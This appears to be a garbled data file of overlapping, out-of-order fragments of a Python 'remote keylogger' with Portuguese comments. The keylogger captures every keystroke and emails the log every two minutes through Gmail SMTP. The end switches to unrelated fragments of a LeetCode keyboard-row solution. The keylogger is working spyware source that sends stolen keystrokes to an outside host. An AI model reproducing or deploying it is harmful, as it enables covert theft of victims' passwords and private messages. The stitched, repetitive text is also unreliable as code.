"(gmail) # O semáforo é para bloquear o segmento atual # O temporizador",
"por sublinhados name = name.replace(\" \", \"_\") name = f\"[{name.upper()}]\" self.log += name",
"name = name.replace(\" \", \"_\") name = f\"[{name.upper()}]\" self.log += name def sendmail(self,",
"\"\" # para bloquear após definir o ouvinte on_release self.semaphore = Semaphore(0) def",
"O temporizador é para executar um método após uma quantidade de tempo \"intervalo\"",
"SEND_REPORT_EVERY para o intervalo self.interval = interval # esta é a variável de",
"definir o ouvinte on_release self.semaphore = Semaphore(0) def callback(self, event): \"\"\" Esse retorno",
"keylogs e redefine a variável \"self.log\" \"\"\" if self.log: # se houver algo",
"houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir em um",
"conexão com um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor",
"# pode imprimir em um arquivo, o que você quiser # imprimir(self.log) self.log",
"\" elif name == \"enter\": # adicione uma nova linha sempre que um",
"que um evento de teclado ocorre (ou seja, quando uma chave é liberada",
"# se não o bloquearmos, quando executarmos o programa, nada acontecerá # isso",
"Esta função é chamada todo \"self.interval\" Ele basicamente envia keylogs e redefine a",
"desde on_release () não bloqueia o segmento atual # se não o bloquearmos,",
"smtplib # para enviar email usando o protocolo SMTP (gmail) # O semáforo",
"ocorre (ou seja, quando uma chave é liberada neste exemplo) \"\"\" name =",
"é chamado sempre que um evento de teclado ocorre (ou seja, quando uma",
"tecla especial (por exemplo, ctrl, alt etc.) # maiúsculas com [] if name",
"function=self.report).start() def start(self): # inicie o keylogger keyboard.on_release(callback=self.callback) # comece a relatar os",
"para o intervalo self.interval = interval # esta é a variável de string",
"port=587) # conectar-se ao servidor SMTP como modo TLS (por segurança) server.starttls() #",
"dentro de \"self.interval\" self.log = \"\" # para bloquear após definir o ouvinte",
"é para bloquear o segmento atual # O temporizador é para executar um",
"bloquear o segmento atual # desde on_release () não bloqueia o segmento atual",
"self.log) # pode imprimir em um arquivo, o que você quiser # imprimir(self.log)",
"que você quiser # imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start() def start(self): #",
"imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start() def start(self): # inicie o keylogger keyboard.on_release(callback=self.callback)",
"em um arquivo, o que você quiser # imprimir(self.log) self.log = \"\" Timer(interval=self.interval,",
"o keylogger keyboard.on_release(callback=self.callback) # comece a relatar os keylogs self.report() # bloquear o",
"email, password, message): # gerencia uma conexão com um servidor SMTP server =",
"não é um caractere, tecla especial (por exemplo, ctrl, alt etc.) # maiúsculas",
"= \"\" # para bloquear após definir o ouvinte on_release self.semaphore = Semaphore(0)",
"keylogger_remoto_py #Um Keylogger Remoto em Python import keyboard # para keylogs import smtplib",
"é a variável de string que contém o log de todos # as",
"uma chave é liberada neste exemplo) \"\"\" name = event.name if len(name) >",
"se não o bloquearmos, quando executarmos o programa, nada acontecerá # isso ocorre",
"elif name == \"enter\": # adicione uma nova linha sempre que um ENTER",
"= \"<<PASSWORD>>\" class Keylogger: def __init__(self, interval): # passaremos SEND_REPORT_EVERY para o intervalo",
"name == \"enter\": # adicione uma nova linha sempre que um ENTER for",
"envie a mensagem real server.sendmail(email, email, message) # finaliza a sessão server.quit() def",
"\".\" else: # substituir espaços por sublinhados name = name.replace(\" \", \"_\") name",
"executar um método após uma quantidade de tempo \"intervalo\" from threading import Semaphore,",
"e redefine a variável \"self.log\" \"\"\" if self.log: # se houver algo no",
"= Semaphore(0) def callback(self, event): \"\"\" Esse retorno de chamada é chamado sempre",
"segmento atual # se não o bloquearmos, quando executarmos o programa, nada acontecerá",
"sessão server.quit() def report(self): \"\"\" Esta função é chamada todo \"self.interval\" Ele basicamente",
"ouvinte em um thread separado self.semaphore.acquire() if __name__ == \"__main__\": keylogger = Keylogger(interval=SEND_REPORT_EVERY)",
"server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor SMTP como modo TLS (por",
"# envie a mensagem real server.sendmail(email, email, message) # finaliza a sessão server.quit()",
"import smtplib # para enviar email usando o protocolo SMTP (gmail) # O",
"+= name def sendmail(self, email, password, message): # gerencia uma conexão com um",
"\"self.interval\" self.log = \"\" # para bloquear após definir o ouvinte on_release self.semaphore",
"programa, nada acontecerá # isso ocorre porque on_release () iniciará o ouvinte em",
"class Keylogger: def __init__(self, interval): # passaremos SEND_REPORT_EVERY para o intervalo self.interval =",
"a variável de string que contém o log de todos # as teclas",
"segmento atual # desde on_release () não bloqueia o segmento atual # se",
"# O semáforo é para bloquear o segmento atual # O temporizador é",
"seja, quando uma chave é liberada neste exemplo) \"\"\" name = event.name if",
"com um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor SMTP",
"você quiser # imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start() def start(self): # inicie",
"if self.log: # se houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) #",
"# \" \"em vez de \"espaço\" name = \" \" elif name ==",
"liberada neste exemplo) \"\"\" name = event.name if len(name) > 1: # não",
"é chamada todo \"self.interval\" Ele basicamente envia keylogs e redefine a variável \"self.log\"",
"a sessão server.quit() def report(self): \"\"\" Esta função é chamada todo \"self.interval\" Ele",
"password) # envie a mensagem real server.sendmail(email, email, message) # finaliza a sessão",
"# maiúsculas com [] if name == \"space\": # \" \"em vez de",
"retorno de chamada é chamado sempre que um evento de teclado ocorre (ou",
"Timer(interval=self.interval, function=self.report).start() def start(self): # inicie o keylogger keyboard.on_release(callback=self.callback) # comece a relatar",
"quando uma chave é liberada neste exemplo) \"\"\" name = event.name if len(name)",
"SMTP (gmail) # O semáforo é para bloquear o segmento atual # O",
"no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir em um arquivo, o",
"semáforo é para bloquear o segmento atual # O temporizador é para executar",
"= 120 # 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger:",
"para bloquear o segmento atual # O temporizador é para executar um método",
"= interval # esta é a variável de string que contém o log",
"\"enter\": # adicione uma nova linha sempre que um ENTER for pressionado name",
"self.log: # se houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode",
"o programa, nada acontecerá # isso ocorre porque on_release () iniciará o ouvinte",
"server.quit() def report(self): \"\"\" Esta função é chamada todo \"self.interval\" Ele basicamente envia",
"self.report() # bloquear o segmento atual # desde on_release () não bloqueia o",
"def callback(self, event): \"\"\" Esse retorno de chamada é chamado sempre que um",
"é liberada neste exemplo) \"\"\" name = event.name if len(name) > 1: #",
"\"_\") name = f\"[{name.upper()}]\" self.log += name def sendmail(self, email, password, message): #",
"conta de email server.login(email, password) # envie a mensagem real server.sendmail(email, email, message)",
"nada acontecerá # isso ocorre porque on_release () iniciará o ouvinte em um",
"= f\"[{name.upper()}]\" self.log += name def sendmail(self, email, password, message): # gerencia uma",
"modo TLS (por segurança) server.starttls() # faça login na conta de email server.login(email,",
"\" \"em vez de \"espaço\" name = \" \" elif name == \"enter\":",
"(por segurança) server.starttls() # faça login na conta de email server.login(email, password) #",
"temporizador é para executar um método após uma quantidade de tempo \"intervalo\" from",
"é um caractere, tecla especial (por exemplo, ctrl, alt etc.) # maiúsculas com",
"uma nova linha sempre que um ENTER for pressionado name = \"[ENTER]\\n\" elif",
"como modo TLS (por segurança) server.starttls() # faça login na conta de email",
"# inicie o keylogger keyboard.on_release(callback=self.callback) # comece a relatar os keylogs self.report() #",
"import Semaphore, Timer SEND_REPORT_EVERY = 120 # 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD",
"de \"self.interval\" self.log = \"\" # para bloquear após definir o ouvinte on_release",
"executarmos o programa, nada acontecerá # isso ocorre porque on_release () iniciará o",
"em Python import keyboard # para keylogs import smtplib # para enviar email",
"# desde on_release () não bloqueia o segmento atual # se não o",
"de teclado ocorre (ou seja, quando uma chave é liberada neste exemplo) \"\"\"",
"keylogger keyboard.on_release(callback=self.callback) # comece a relatar os keylogs self.report() # bloquear o segmento",
"quando executarmos o programa, nada acontecerá # isso ocorre porque on_release () iniciará",
"de chamada é chamado sempre que um evento de teclado ocorre (ou seja,",
"quiser # imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start() def start(self): # inicie o",
"# adicione uma nova linha sempre que um ENTER for pressionado name =",
"name == \"decimal\": name = \".\" else: # substituir espaços por sublinhados name",
"event): \"\"\" Esse retorno de chamada é chamado sempre que um evento de",
"\"\" Timer(interval=self.interval, function=self.report).start() def start(self): # inicie o keylogger keyboard.on_release(callback=self.callback) # comece a",
"uma quantidade de tempo \"intervalo\" from threading import Semaphore, Timer SEND_REPORT_EVERY = 120",
"tempo \"intervalo\" from threading import Semaphore, Timer SEND_REPORT_EVERY = 120 # 02 minutes",
"import keyboard # para keylogs import smtplib # para enviar email usando o",
"\", \"_\") name = f\"[{name.upper()}]\" self.log += name def sendmail(self, email, password, message):",
"= \"\" Timer(interval=self.interval, function=self.report).start() def start(self): # inicie o keylogger keyboard.on_release(callback=self.callback) # comece",
"vez de \"espaço\" name = \" \" elif name == \"enter\": # adicione",
"= name.replace(\" \", \"_\") name = f\"[{name.upper()}]\" self.log += name def sendmail(self, email,",
"o ouvinte em um thread separado self.semaphore.acquire() if __name__ == \"__main__\": keylogger =",
"sempre que um evento de teclado ocorre (ou seja, quando uma chave é",
"segurança) server.starttls() # faça login na conta de email server.login(email, password) # envie",
"\"self.log\" \"\"\" if self.log: # se houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD,",
"name.replace(\" \", \"_\") name = f\"[{name.upper()}]\" self.log += name def sendmail(self, email, password,",
"def __init__(self, interval): # passaremos SEND_REPORT_EVERY para o intervalo self.interval = interval #",
"SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor SMTP como modo TLS",
"name = \" \" elif name == \"enter\": # adicione uma nova linha",
"Timer SEND_REPORT_EVERY = 120 # 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\"",
"método após uma quantidade de tempo \"intervalo\" from threading import Semaphore, Timer SEND_REPORT_EVERY",
"Semaphore(0) def callback(self, event): \"\"\" Esse retorno de chamada é chamado sempre que",
"# 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def __init__(self,",
"len(name) > 1: # não é um caractere, tecla especial (por exemplo, ctrl,",
"para bloquear após definir o ouvinte on_release self.semaphore = Semaphore(0) def callback(self, event):",
"\"intervalo\" from threading import Semaphore, Timer SEND_REPORT_EVERY = 120 # 02 minutes EMAIL_ADDRESS",
"variável de string que contém o log de todos # as teclas dentro",
"keyboard.on_release(callback=self.callback) # comece a relatar os keylogs self.report() # bloquear o segmento atual",
"(ou seja, quando uma chave é liberada neste exemplo) \"\"\" name = event.name",
"\"em vez de \"espaço\" name = \" \" elif name == \"enter\": #",
"redefine a variável \"self.log\" \"\"\" if self.log: # se houver algo no log,",
"na conta de email server.login(email, password) # envie a mensagem real server.sendmail(email, email,",
"comece a relatar os keylogs self.report() # bloquear o segmento atual # desde",
"após definir o ouvinte on_release self.semaphore = Semaphore(0) def callback(self, event): \"\"\" Esse",
"todo \"self.interval\" Ele basicamente envia keylogs e redefine a variável \"self.log\" \"\"\" if",
"#Um Keylogger Remoto em Python import keyboard # para keylogs import smtplib #",
"# comece a relatar os keylogs self.report() # bloquear o segmento atual #",
"minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def __init__(self, interval): #",
"ENTER for pressionado name = \"[ENTER]\\n\" elif name == \"decimal\": name = \".\"",
"de tempo \"intervalo\" from threading import Semaphore, Timer SEND_REPORT_EVERY = 120 # 02",
"Ele basicamente envia keylogs e redefine a variável \"self.log\" \"\"\" if self.log: #",
"o segmento atual # desde on_release () não bloqueia o segmento atual #",
"name == \"space\": # \" \"em vez de \"espaço\" name = \" \"",
"ctrl, alt etc.) # maiúsculas com [] if name == \"space\": # \"",
"função é chamada todo \"self.interval\" Ele basicamente envia keylogs e redefine a variável",
"# para enviar email usando o protocolo SMTP (gmail) # O semáforo é",
"ouvinte on_release self.semaphore = Semaphore(0) def callback(self, event): \"\"\" Esse retorno de chamada",
"# não é um caractere, tecla especial (por exemplo, ctrl, alt etc.) #",
"o intervalo self.interval = interval # esta é a variável de string que",
"name def sendmail(self, email, password, message): # gerencia uma conexão com um servidor",
"quantidade de tempo \"intervalo\" from threading import Semaphore, Timer SEND_REPORT_EVERY = 120 #",
"# faça login na conta de email server.login(email, password) # envie a mensagem",
"string que contém o log de todos # as teclas dentro de \"self.interval\"",
"sublinhados name = name.replace(\" \", \"_\") name = f\"[{name.upper()}]\" self.log += name def",
"name = \"[ENTER]\\n\" elif name == \"decimal\": name = \".\" else: # substituir",
"() iniciará o ouvinte em um thread separado self.semaphore.acquire() if __name__ == \"__main__\":",
"um ENTER for pressionado name = \"[ENTER]\\n\" elif name == \"decimal\": name =",
"def report(self): \"\"\" Esta função é chamada todo \"self.interval\" Ele basicamente envia keylogs",
"atual # desde on_release () não bloqueia o segmento atual # se não",
"keylogs self.report() # bloquear o segmento atual # desde on_release () não bloqueia",
"# imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start() def start(self): # inicie o keylogger",
"relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir em um arquivo, o que você",
"== \"space\": # \" \"em vez de \"espaço\" name = \" \" elif",
"# bloquear o segmento atual # desde on_release () não bloqueia o segmento",
"caractere, tecla especial (por exemplo, ctrl, alt etc.) # maiúsculas com [] if",
"etc.) # maiúsculas com [] if name == \"space\": # \" \"em vez",
"# se houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir",
"interval # esta é a variável de string que contém o log de",
"chamada é chamado sempre que um evento de teclado ocorre (ou seja, quando",
"self.log += name def sendmail(self, email, password, message): # gerencia uma conexão com",
"pode imprimir em um arquivo, o que você quiser # imprimir(self.log) self.log =",
"SEND_REPORT_EVERY = 120 # 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class",
"o ouvinte on_release self.semaphore = Semaphore(0) def callback(self, event): \"\"\" Esse retorno de",
"on_release () iniciará o ouvinte em um thread separado self.semaphore.acquire() if __name__ ==",
"teclas dentro de \"self.interval\" self.log = \"\" # para bloquear após definir o",
"# substituir espaços por sublinhados name = name.replace(\" \", \"_\") name = f\"[{name.upper()}]\"",
"chamado sempre que um evento de teclado ocorre (ou seja, quando uma chave",
"de todos # as teclas dentro de \"self.interval\" self.log = \"\" # para",
"email, message) # finaliza a sessão server.quit() def report(self): \"\"\" Esta função é",
"de \"espaço\" name = \" \" elif name == \"enter\": # adicione uma",
"imprimir em um arquivo, o que você quiser # imprimir(self.log) self.log = \"\"",
"elif name == \"decimal\": name = \".\" else: # substituir espaços por sublinhados",
"para keylogs import smtplib # para enviar email usando o protocolo SMTP (gmail)",
"O semáforo é para bloquear o segmento atual # O temporizador é para",
"a mensagem real server.sendmail(email, email, message) # finaliza a sessão server.quit() def report(self):",
"isso ocorre porque on_release () iniciará o ouvinte em um thread separado self.semaphore.acquire()",
"conectar-se ao servidor SMTP como modo TLS (por segurança) server.starttls() # faça login",
"de string que contém o log de todos # as teclas dentro de",
"on_release () não bloqueia o segmento atual # se não o bloquearmos, quando",
"evento de teclado ocorre (ou seja, quando uma chave é liberada neste exemplo)",
"# as teclas dentro de \"self.interval\" self.log = \"\" # para bloquear após",
"chave é liberada neste exemplo) \"\"\" name = event.name if len(name) > 1:",
"os keylogs self.report() # bloquear o segmento atual # desde on_release () não",
"message) # finaliza a sessão server.quit() def report(self): \"\"\" Esta função é chamada",
"# conectar-se ao servidor SMTP como modo TLS (por segurança) server.starttls() # faça",
"segmento atual # O temporizador é para executar um método após uma quantidade",
"[] if name == \"space\": # \" \"em vez de \"espaço\" name =",
"__init__(self, interval): # passaremos SEND_REPORT_EVERY para o intervalo self.interval = interval # esta",
"passaremos SEND_REPORT_EVERY para o intervalo self.interval = interval # esta é a variável",
"# esta é a variável de string que contém o log de todos",
"report(self): \"\"\" Esta função é chamada todo \"self.interval\" Ele basicamente envia keylogs e",
"1: # não é um caractere, tecla especial (por exemplo, ctrl, alt etc.)",
"\"\"\" Esse retorno de chamada é chamado sempre que um evento de teclado",
"if name == \"space\": # \" \"em vez de \"espaço\" name = \"",
"sendmail(self, email, password, message): # gerencia uma conexão com um servidor SMTP server",
"= smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor SMTP como modo TLS (por segurança)",
"espaços por sublinhados name = name.replace(\" \", \"_\") name = f\"[{name.upper()}]\" self.log +=",
"um evento de teclado ocorre (ou seja, quando uma chave é liberada neste",
"iniciará o ouvinte em um thread separado self.semaphore.acquire() if __name__ == \"__main__\": keylogger",
"um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor SMTP como",
"\"<<PASSWORD>>\" class Keylogger: def __init__(self, interval): # passaremos SEND_REPORT_EVERY para o intervalo self.interval",
"password, message): # gerencia uma conexão com um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\",",
"\"espaço\" name = \" \" elif name == \"enter\": # adicione uma nova",
"callback(self, event): \"\"\" Esse retorno de chamada é chamado sempre que um evento",
"# para bloquear após definir o ouvinte on_release self.semaphore = Semaphore(0) def callback(self,",
"() não bloqueia o segmento atual # se não o bloquearmos, quando executarmos",
"# passaremos SEND_REPORT_EVERY para o intervalo self.interval = interval # esta é a",
"login na conta de email server.login(email, password) # envie a mensagem real server.sendmail(email,",
"name = \".\" else: # substituir espaços por sublinhados name = name.replace(\" \",",
"Python import keyboard # para keylogs import smtplib # para enviar email usando",
"SMTP como modo TLS (por segurança) server.starttls() # faça login na conta de",
"= \".\" else: # substituir espaços por sublinhados name = name.replace(\" \", \"_\")",
"log de todos # as teclas dentro de \"self.interval\" self.log = \"\" #",
"email usando o protocolo SMTP (gmail) # O semáforo é para bloquear o",
"que contém o log de todos # as teclas dentro de \"self.interval\" self.log",
"adicione uma nova linha sempre que um ENTER for pressionado name = \"[ENTER]\\n\"",
"um thread separado self.semaphore.acquire() if __name__ == \"__main__\": keylogger = Keylogger(interval=SEND_REPORT_EVERY) keylogger.start() #by",
"name = f\"[{name.upper()}]\" self.log += name def sendmail(self, email, password, message): # gerencia",
"protocolo SMTP (gmail) # O semáforo é para bloquear o segmento atual #",
"# isso ocorre porque on_release () iniciará o ouvinte em um thread separado",
"= \" \" elif name == \"enter\": # adicione uma nova linha sempre",
"substituir espaços por sublinhados name = name.replace(\" \", \"_\") name = f\"[{name.upper()}]\" self.log",
"acontecerá # isso ocorre porque on_release () iniciará o ouvinte em um thread",
"EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def __init__(self, interval): # passaremos SEND_REPORT_EVERY para o",
"intervalo self.interval = interval # esta é a variável de string que contém",
"\"\"\" if self.log: # se houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)",
"= \"[ENTER]\\n\" elif name == \"decimal\": name = \".\" else: # substituir espaços",
"self.log = \"\" # para bloquear após definir o ouvinte on_release self.semaphore =",
"um caractere, tecla especial (por exemplo, ctrl, alt etc.) # maiúsculas com []",
"self.log = \"\" Timer(interval=self.interval, function=self.report).start() def start(self): # inicie o keylogger keyboard.on_release(callback=self.callback) #",
"smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor SMTP como modo TLS (por segurança) server.starttls()",
"EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def __init__(self, interval): # passaremos",
"def start(self): # inicie o keylogger keyboard.on_release(callback=self.callback) # comece a relatar os keylogs",
"não bloqueia o segmento atual # se não o bloquearmos, quando executarmos o",
"Keylogger: def __init__(self, interval): # passaremos SEND_REPORT_EVERY para o intervalo self.interval = interval",
"event.name if len(name) > 1: # não é um caractere, tecla especial (por",
"a variável \"self.log\" \"\"\" if self.log: # se houver algo no log, relate-o",
"\" \" elif name == \"enter\": # adicione uma nova linha sempre que",
"enviar email usando o protocolo SMTP (gmail) # O semáforo é para bloquear",
"== \"decimal\": name = \".\" else: # substituir espaços por sublinhados name =",
"basicamente envia keylogs e redefine a variável \"self.log\" \"\"\" if self.log: # se",
"TLS (por segurança) server.starttls() # faça login na conta de email server.login(email, password)",
"o bloquearmos, quando executarmos o programa, nada acontecerá # isso ocorre porque on_release",
"que um ENTER for pressionado name = \"[ENTER]\\n\" elif name == \"decimal\": name",
"exemplo, ctrl, alt etc.) # maiúsculas com [] if name == \"space\": #",
"\"\"\" name = event.name if len(name) > 1: # não é um caractere,",
"mensagem real server.sendmail(email, email, message) # finaliza a sessão server.quit() def report(self): \"\"\"",
"log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir em um arquivo, o que",
"thread separado self.semaphore.acquire() if __name__ == \"__main__\": keylogger = Keylogger(interval=SEND_REPORT_EVERY) keylogger.start() #by Herik_Carvalho",
"server.sendmail(email, email, message) # finaliza a sessão server.quit() def report(self): \"\"\" Esta função",
"start(self): # inicie o keylogger keyboard.on_release(callback=self.callback) # comece a relatar os keylogs self.report()",
"nova linha sempre que um ENTER for pressionado name = \"[ENTER]\\n\" elif name",
"threading import Semaphore, Timer SEND_REPORT_EVERY = 120 # 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\"",
"\"decimal\": name = \".\" else: # substituir espaços por sublinhados name = name.replace(\"",
"Remoto em Python import keyboard # para keylogs import smtplib # para enviar",
"else: # substituir espaços por sublinhados name = name.replace(\" \", \"_\") name =",
"self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir em um arquivo, o que você quiser",
"para executar um método após uma quantidade de tempo \"intervalo\" from threading import",
"120 # 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def",
"servidor SMTP como modo TLS (por segurança) server.starttls() # faça login na conta",
"arquivo, o que você quiser # imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start() def",
"chamada todo \"self.interval\" Ele basicamente envia keylogs e redefine a variável \"self.log\" \"\"\"",
"o protocolo SMTP (gmail) # O semáforo é para bloquear o segmento atual",
"o segmento atual # se não o bloquearmos, quando executarmos o programa, nada",
"= \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def __init__(self, interval): # passaremos SEND_REPORT_EVERY",
"as teclas dentro de \"self.interval\" self.log = \"\" # para bloquear após definir",
"é para executar um método após uma quantidade de tempo \"intervalo\" from threading",
"não o bloquearmos, quando executarmos o programa, nada acontecerá # isso ocorre porque",
"self.semaphore = Semaphore(0) def callback(self, event): \"\"\" Esse retorno de chamada é chamado",
"ao servidor SMTP como modo TLS (por segurança) server.starttls() # faça login na",
"# keylogger_remoto_py #Um Keylogger Remoto em Python import keyboard # para keylogs import",
"02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def __init__(self, interval):",
"self.interval = interval # esta é a variável de string que contém o",
"teclado ocorre (ou seja, quando uma chave é liberada neste exemplo) \"\"\" name",
"EMAIL_PASSWORD, self.log) # pode imprimir em um arquivo, o que você quiser #",
"real server.sendmail(email, email, message) # finaliza a sessão server.quit() def report(self): \"\"\" Esta",
"def sendmail(self, email, password, message): # gerencia uma conexão com um servidor SMTP",
"atual # O temporizador é para executar um método após uma quantidade de",
"esta é a variável de string que contém o log de todos #",
"usando o protocolo SMTP (gmail) # O semáforo é para bloquear o segmento",
"keyboard # para keylogs import smtplib # para enviar email usando o protocolo",
"Keylogger Remoto em Python import keyboard # para keylogs import smtplib # para",
"if len(name) > 1: # não é um caractere, tecla especial (por exemplo,",
"\"\"\" Esta função é chamada todo \"self.interval\" Ele basicamente envia keylogs e redefine",
"envia keylogs e redefine a variável \"self.log\" \"\"\" if self.log: # se houver",
"algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir em um arquivo,",
"bloquear após definir o ouvinte on_release self.semaphore = Semaphore(0) def callback(self, event): \"\"\"",
"\"[ENTER]\\n\" elif name == \"decimal\": name = \".\" else: # substituir espaços por",
"o log de todos # as teclas dentro de \"self.interval\" self.log = \"\"",
"relatar os keylogs self.report() # bloquear o segmento atual # desde on_release ()",
"Esse retorno de chamada é chamado sempre que um evento de teclado ocorre",
"faça login na conta de email server.login(email, password) # envie a mensagem real",
"após uma quantidade de tempo \"intervalo\" from threading import Semaphore, Timer SEND_REPORT_EVERY =",
"inicie o keylogger keyboard.on_release(callback=self.callback) # comece a relatar os keylogs self.report() # bloquear",
"atual # se não o bloquearmos, quando executarmos o programa, nada acontecerá #",
"server.login(email, password) # envie a mensagem real server.sendmail(email, email, message) # finaliza a",
"from threading import Semaphore, Timer SEND_REPORT_EVERY = 120 # 02 minutes EMAIL_ADDRESS =",
"servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor SMTP como modo",
"alt etc.) # maiúsculas com [] if name == \"space\": # \" \"em",
"# O temporizador é para executar um método após uma quantidade de tempo",
"bloqueia o segmento atual # se não o bloquearmos, quando executarmos o programa,",
"um arquivo, o que você quiser # imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start()",
"todos # as teclas dentro de \"self.interval\" self.log = \"\" # para bloquear",
"# finaliza a sessão server.quit() def report(self): \"\"\" Esta função é chamada todo",
"de email server.login(email, password) # envie a mensagem real server.sendmail(email, email, message) #",
"para enviar email usando o protocolo SMTP (gmail) # O semáforo é para",
"\"self.interval\" Ele basicamente envia keylogs e redefine a variável \"self.log\" \"\"\" if self.log:",
"pressionado name = \"[ENTER]\\n\" elif name == \"decimal\": name = \".\" else: #",
"bloquearmos, quando executarmos o programa, nada acontecerá # isso ocorre porque on_release ()"
] |
[
"return the words that can be typed using letters of alphabet on only",
"= ['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p']; row2 =",
"Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You may use",
"for letter in list(word.lower()): if letter in row1: Hash['first'] = Hash['first'] + 1",
"typed using letters of alphabet on only one row's of American keyboard like",
"list(word.lower()): if letter in row1: Hash['first'] = Hash['first'] + 1 if letter in",
"{'first': 0, 'second': 0, 'third': 0} for letter in list(word.lower()): if letter in",
"\"\"\" from typing import List class Solution: def findWords(self, words: List[str]) -> List[str]:",
"Solution: def findWords(self, words: List[str]) -> List[str]: row1 = ['q', 'w', 'e', 'r',",
"image below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You",
"row2 = ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l'] row3 =",
"alphabet. \"\"\" from typing import List class Solution: def findWords(self, words: List[str]) ->",
"List class Solution: def findWords(self, words: List[str]) -> List[str]: row1 = ['q', 'w',",
"like the image below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"]",
"if letter in row3: Hash['third'] = Hash['third'] + 1 if Hash['first'] == len(word)",
"Hash['third'] = Hash['third'] + 1 if Hash['first'] == len(word) or Hash['second'] == len(word)",
"['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l'] row3 = ['z', 'x',",
"= Hash['third'] + 1 if Hash['first'] == len(word) or Hash['second'] == len(word) or",
"'y', 'u', 'i', 'o', 'p']; row2 = ['a', 's', 'd', 'f', 'g', 'h',",
"You may use one character in the keyboard more than once. You may",
"'third': 0} for letter in list(word.lower()): if letter in row1: Hash['first'] = Hash['first']",
"Hash['first'] == len(word) or Hash['second'] == len(word) or Hash['third'] == len(word): inteligentWords.append(word) return",
"'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p']; row2 = ['a', 's',",
"Hash['third'] + 1 if Hash['first'] == len(word) or Hash['second'] == len(word) or Hash['third']",
"Hash['first'] + 1 if letter in row2: Hash['second'] = Hash['second'] + 1 if",
"inteligentWords = [] for word in words: Hash = {'first': 0, 'second': 0,",
"from typing import List class Solution: def findWords(self, words: List[str]) -> List[str]: row1",
"class Solution: def findWords(self, words: List[str]) -> List[str]: row1 = ['q', 'w', 'e',",
"'p']; row2 = ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l'] row3",
"words that can be typed using letters of alphabet on only one row's",
"below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You may",
"letter in row2: Hash['second'] = Hash['second'] + 1 if letter in row3: Hash['third']",
"keyboard like the image below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\",",
"Hash['second'] = Hash['second'] + 1 if letter in row3: Hash['third'] = Hash['third'] +",
"'b', 'n', 'm'] inteligentWords = [] for word in words: Hash = {'first':",
"Hash = {'first': 0, 'second': 0, 'third': 0} for letter in list(word.lower()): if",
